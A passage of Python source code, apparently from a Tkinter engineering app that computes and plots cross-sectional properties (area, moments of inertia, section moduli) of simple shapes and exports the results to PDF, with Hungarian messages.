print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
if 0 < t < a/2 and 0 < t < b/2:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
else:
if 0 < t >= a/2 and a == b:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
if 0 < t >= a/2 and 0 < t < b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif 0 < t >= b/2 and 0 < t < a/2:
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif t >= a/2 and t >= b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
t = 0
#self.sm.e2.config({"background": self.colors['entry_color']})
return vissza,t
'''
def get_entry(self, number_of_entries):
vissza = []
for i in range(number_of_entries + self.transformed_coordinate_on.get() * 3):
if i >= 1 and self.sm.shape == "Circle": #! Jujj de csúnya...
i+=1
if self.sm.controls[i]["entry"].get().replace(',','.') == "":
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
elif float(self.sm.controls[i]["entry"].get().replace(',','.')) > 0:
vissza.append(float(self.sm.controls[i]["entry"].get().replace(',','.')))
self.sm.controls[i]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[i]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
vissza.append(None)
if self.thickness_on.get():
if self.sm.shape == "Circle":
print("Kor szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
if 0 < t < d/2 or t is not None:
print("kor lehetseges")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
else:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
elif self.sm.shape == "Right_triangle":
print("Derekszogu haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/a)
c = np.sqrt(a**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = np.sqrt(b**2 + (a/2)**2)
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = np.sqrt(a**2 + (b/2)**2)
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
t2 = b/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t3 = (2*s3/3)*np.sin(beta)
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif self.sm.shape == "Isosceles_triangle":
print("Egyenloszaru haromszog szamitas")
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
phi = np.arctan(b/ (a/2))
c = np.sqrt((a/2)**2 + b**2)
print('phi: ' + str(phi*180/np.pi))
print('c: ' + str(c))
s1 = b
s2 = np.sqrt(a**2 + (c/2)**2 - 2*a*(c/2)*np.cos(phi))
s3 = s2
print('s2: ' + str(s2))
print('s3: ' + str(s3))
t1 = a/3
beta = np.arccos( ( (s2/3)**2 - (2*s3/3)**2 - (c/2)**2 ) / ( -2 * (2*s3/3) * (c/2) ) )
print('beta: ' + str(beta))
t2 = (2*s2/3)*np.sin(beta)
t3 =t2
print('t1: ' + str(t1))
print('t2: ' + str(t2))
print('t3: ' + str(t3))
# selecting the smallest
t_min = min(t1, t2, t3)
print('legkisebb: ' + str(t_min))
if 0 < t:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
if 0 < t >= t_min:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
print("Teglalap szamitas (egyenlore minden mas is)")
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
if 0 < t < a/2 and 0 < t < b/2:
try:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
self.sm.controls[-1]["entry"].config({"background": self.colors['entry_color']})
except:
print("Hiba")
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
t = None
else:
if 0 < t >= a/2 and a == b:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
if 0 < t >= a/2 and 0 < t < b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif 0 < t >= b/2 and 0 < t < a/2:
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
elif t >= a/2 and t >= b/2:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
self.sm.controls[0]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[1]["entry"].config({"background": self.colors['error_color']})
self.sm.controls[-1]["entry"].config({"background": self.colors['error_color']})
for i in self.sm.indicators:
i.config(text="")
self.sm.result1.config(text="Hiba a bemeneti adatokban!")
self.sm.result2.config(text="Hiba a falvastagságban!")
vissza.append(None)
else:
t = 0
#self.sm.e2.config({"background": self.colors['entry_color']})
return vissza,t '''
def calculate(self, event=None):
for i in self.sm.indicators:
i.config(text="")
if not self.shape_builder_mode:
if self.sm.shape == "Rectangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.Rectangle(*vissza[:2], t, *vissza[2:], rad = self.angle_unit == "rad")
self.sm.result0.config(text = "Keresztmetszeti jellemzők:")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"] # ez radián
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transformed")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notransformed")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Circle":
vissza, t = self.get_entry(1)
if None in vissza:
return -1
self.values = Calc.Circle(vissza[0], t, *vissza[1:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transformed")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notransformed")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = Kᵧ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kₚ = " + str(round(self.values["Kp"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Ellipse":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.Ellipse(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Isosceles_triangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.IsoscelesTriangle(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
elif self.sm.shape == "Right_triangle":
vissza, t = self.get_entry(2)
if None in vissza:
return -1
self.values = Calc.RightTriangle(*vissza[:2], t, *vissza[2:],rad = self.angle_unit == "rad")
self.sm.result1.config(text="A = " + str(round(self.values["A"], 4)) + " " + self.unit + "²")
alpha = self.values["alpha"]
if self.angle_unit == '°':
alpha = alpha/np.pi*180
else:
alpha = alpha
if self.transformed_coordinate_on.get() == True:
print("transcoord")
self.sm.result2.config(text="Iₓ₁ = " + str(round(self.values["Ixi"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ₁ = " + str(round(self.values["Ieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓ₁ᵧ₁ = " + str(round(self.values["Ixieta"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
else:
print("notrans")
self.sm.result2.config(text="Iₓ = " + str(round(self.values["Ix"], 4)) + " " + self.unit + "\u2074")
self.sm.result3.config(text="Iᵧ = " + str(round(self.values["Iy"], 4)) + " " + self.unit + "\u2074")
self.sm.result4.config(text="Iₓᵧ = " + str(round(self.values["Ixy"], 4)) + " " + self.unit + "\u2074")
self.sm.result5.config(text="Iₚ = " + str(round(self.values["Ip"], 4)) + " " + self.unit + "\u2074")
self.sm.result6.config(text="Főmásodrendű nyomatékok:")
self.sm.result7.config(text="I₁ = " + str(round(self.values["I1"], 4)) + " " + self.unit + "\u2074")
self.sm.result8.config(text="I₂ = " + str(round(self.values["I2"], 4)) + " " + self.unit + "\u2074")
self.sm.result9.config(text="\u03B1 = " + str(round(alpha, 4)) + " " + self.angle_unit)
self.sm.result10.config(text="Keresztmetszeti tényezők:")
self.sm.result11.config(text="Kₓ = " + str(round(self.values["Kx"], 4)) + " " + self.unit + "\u00B3")
self.sm.result12.config(text="Kᵧ = " + str(round(self.values["Ky"], 4)) + " " + self.unit + "\u00B3")
else:
print("Hiba, az alakzat nem talalhato")
if self.transformed_coordinate_on.get() == False:
if self.sm.shape == "Circle":
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit)
plot_principal_axes(self, self.colors, self.ax, self.values["alpha"],self.angle_unit, self.transformed_coordinate_on.get(), self.sm.shape)
else:
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, vissza[0], vissza[1], vissza[0])
plot_principal_axes(self, self.colors, self.ax, self.values["alpha"],self.angle_unit, self.transformed_coordinate_on.get(), self.sm.shape, vissza[0], vissza[1], vissza[0])
else:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
rot = float(self.sm.te3.get().replace(',','.'))
if self.sm.shape == "Circle":
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, calculated = True, u=u, v=v, rot=rot)
else:
plot(self, self.sm.shape, self.coordinate_on.get(), self.dimension_lines_on.get(), self.transformed_coordinate_on.get(), self.thickness_on.get(), self.colors, self.angle_unit, vissza[0], vissza[1], vissza[0], calculated = True, u=u, v=v, rot=rot)
def save_file(self):
if self.shape_builder_mode == False:
if self.sm.result4.cget("text") != "":
print('Alap mod mentes')
date=dt.datetime.now()
filename = "eredmenyek_" + f"{date:%y_%m_%d_%H_%M}"
f = asksaveasfile(initialfile = filename,
defaultextension=".pdf",filetypes=[("PDF Files","*.pdf"),("All files","*.*")])
if f is None:
return
if self.sm.shape == "Circle":
d = float(self.sm.controls[0]["entry"].get().replace(',','.'))
if self.transformed_coordinate_on.get() == True:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
phi = float(self.sm.te3.get().replace(',','.'))
else:
u = 0
v = 0
phi = 0
else:
a = float(self.sm.controls[0]["entry"].get().replace(',','.'))
b = float(self.sm.controls[1]["entry"].get().replace(',','.'))
if self.transformed_coordinate_on.get() == True:
u = float(self.sm.te1.get().replace(',','.'))
v = float(self.sm.te2.get().replace(',','.'))
phi = float(self.sm.te3.get().replace(',','.'))
else:
u = 0
v = 0
phi = 0
if self.thickness_on.get() == True:
t = float(self.sm.controls[-1]["entry"].get().replace(',','.'))
else:
t = 0
# saving to pdf
pdf = FPDF()
pdf.add_page()
pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
pdf.set_font('DejaVu', '', 12)
self.fig.patch.set_facecolor("#FFFFFF")
self.canvas.draw()
tempfig_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\tempfig.png"
self.canvas.print_figure(tempfig_path, 250)
self.fig.patch.set_facecolor(self.colors["secondary_color"])
self.canvas.draw()
pdf.set_text_color(0,0,0)
if self.thickness_on.get() == True:
print('belep az agba')
im = Image.open(tempfig_path)
data = np.array(im)
if self.theme == "dark":
r1, g1, b1 = 51, 51, 51 # Original value
else:
r1, g1, b1 = 244, 242, 244 # Original value
r2, g2, b2 = 255, 255, 255 # Value that we want to replace it with
red, green, blue = data[:,:,0], data[:,:,1], data[:,:,2]
mask = (red == r1) & (green == g1) & (blue == b1)
data[:,:,:3][mask] = [r2, g2, b2]
im = Image.fromarray(data)
im.save(tempfig_path)
else:
print('nem lep be')
None
self.canvas.draw()
pdf.image(tempfig_path, x = 55, y = 15, w = 170, h = 0, type = 'PNG')
if self.sm.shape == "Circle":
pdf.cell(200, 10, txt = 'Az alakzat: ', ln = 1, align = 'L')
pdf.cell(200, 10, txt = self.sm.shape + ' (d = ' + str(round(d, 4)) + " " + self.unit + ', t = ' +
str(round(t, 4)) + " " + self.unit + ', u = ' + str(round(u, 4)) + " " + self.unit +
', v = ' + str(round(v, 4)) + " " + self.unit + ', \u03c6 = ' + str(round(phi, 4)) + " " + self.angle_unit +')' ,ln = 2, align = 'L')
else:
pdf.cell(200, 10, txt = 'Az alakzat: ', ln = 1, align = 'L')
pdf.cell(200, 10, txt = self.sm.shape + ' (a = ' + str(round(a, 4)) + " " + self.unit + ', b = ' + str(round(b, 4)) + " " + self.unit + ', t = ' +
str(round(t, 4)) + " " + self.unit + ', u = ' + str(round(u, 4)) + " " + self.unit +
', v = ' + str(round(v, 4)) + " " + self.unit + ', \u03c6 = ' + str(round(phi, 4)) + " " + self.angle_unit +')' , ln = 2, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = "Keresztmetszeti jellemzők:" , ln = 3, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result1.cget("text") , ln = 4, align = 'L')
pdf.cell(200, 10, txt = self.sm.result2.cget("text"), ln = 5, align = 'L')
pdf.cell(200, 10, txt = self.sm.result3.cget("text"), ln = 6, align = 'L')
pdf.cell(200, 10, txt = self.sm.result4.cget("text"), ln = 7, align = 'L')
pdf.cell(200, 10, txt = self.sm.result5.cget("text"), ln = 8, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sm.result6.cget("text"), ln = 9, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result7.cget("text"), ln = 10, align = 'L')
pdf.cell(200, 10, txt = self.sm.result8.cget("text"), ln = 11, align = 'L')
pdf.cell(200, 10, txt = self.sm.result9.cget("text"), ln = 12, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sm.result10.cget("text"), ln = 13, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sm.result11.cget("text"), ln = 14, align = 'L')
pdf.cell(200, 10, txt = self.sm.result12.cget("text"), ln = 15, align = 'L')
pdf.output(f.name, 'F')
pdf.close()
else:
error_window(self)
else:
if self.sb.result4.cget("text") != "":
print('Mentes shapebuilder')
date=dt.datetime.now()
filename = "eredmenyek_" + f"{date:%y_%m_%d_%H_%M}"
tempfig_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\tempfig.png"
self.sb.configure(bg='#FFFFFF')
self.sb.visual_grid.delete_grid()
self.sb.update_idletasks()
x=root.winfo_rootx()+self.sb.winfo_x()
y=root.winfo_rooty()+self.sb.winfo_y()
x1=x+self.sb.winfo_width()
y1=y+self.sb.winfo_height()
ImageGrab.grab().crop((x,y,x1,y1)).save(tempfig_path)
self.sb.configure(bg=self.colors["secondary_color"])
self.sb.visual_grid.create_grid(self.sb.scale, self.sb.Xcenter, self.sb.Ycenter, self.sb.scale_factor)
self.sb.update_idletasks()
pdf = FPDF()
pdf.add_page()
pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
pdf.set_font('DejaVu', '', 12)
f = asksaveasfile(initialfile = filename,
defaultextension=".pdf",filetypes=[("PDF Files","*.pdf"),("All files","*.*")])
if f is None:
return
pdf.image(tempfig_path, x = 15, y = 5, w = 180, h = 0, type = 'PNG')
pdf.image('cover.png', x = 0, y = 0, w = 35, h = 60, type = 'PNG') # top-left
pdf.image('cover.png', x = 180, y = 0, w = 50, h = 0, type = 'PNG') # top-right
pdf.image('cover.png', x = 0, y = 80, w = 25, h = 60, type = 'PNG') # bottom-left
pdf.image('cover.png', x = 175, y = 80, w = 50, h = 0, type = 'PNG') # bottom-right
pdf.set_y(120)
pdf.cell(200, 10, txt = 'Saját alakzat:', ln = 20, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result1.cget("text") , ln = 2, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result2.cget("text"), ln = 3, align = 'L')
pdf.cell(200, 10, txt = self.sb.result3.cget("text"), ln = 4, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result4.cget("text"), ln = 5, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result5.cget("text"), ln = 6, align = 'L')
pdf.cell(200, 10, txt = self.sb.result6.cget("text"), ln = 7, align = 'L')
pdf.cell(200, 10, txt = self.sb.result7.cget("text"), ln = 8, align = 'L')
pdf.cell(200, 10, txt = self.sb.result8.cget("text"), ln = 9, align = 'L')
pdf.cell(200, 10, txt = self.sb.result9.cget("text"), ln = 10, align = 'L')
pdf.set_x(10)
pdf.cell(200, 10, txt = self.sb.result10.cget("text"), ln = 11, align = 'L')
pdf.set_x(20)
pdf.cell(200, 10, txt = self.sb.result11.cget("text"), ln = 12, align = 'L')
pdf.cell(200, 10, txt = self.sb.result12.cget("text"), ln = 13, align = 'L')
pdf.cell(200, 10, txt = self.sb.result13.cget("text"), ln = 14, align = 'L')
pdf.output(f.name, 'F')
pdf.close()
else:
error_window(self)
def doNothing(self):
print("Ez a funkció jelenleg nem elérhető...")
# VARIABLES ---------------------------------------------------------------------------------------------------------------------------------------------
DARK_THEME = {
'main_color': '#1a1a1a',
'secondary_color': '#333333',
'text_color': '#cccccc',
'entry_color': '#262626',
'disabled_color':'#333333',
'error_color':'red',
'draw_main': '#87aade',
'draw_secondary': '#1a1a1a',
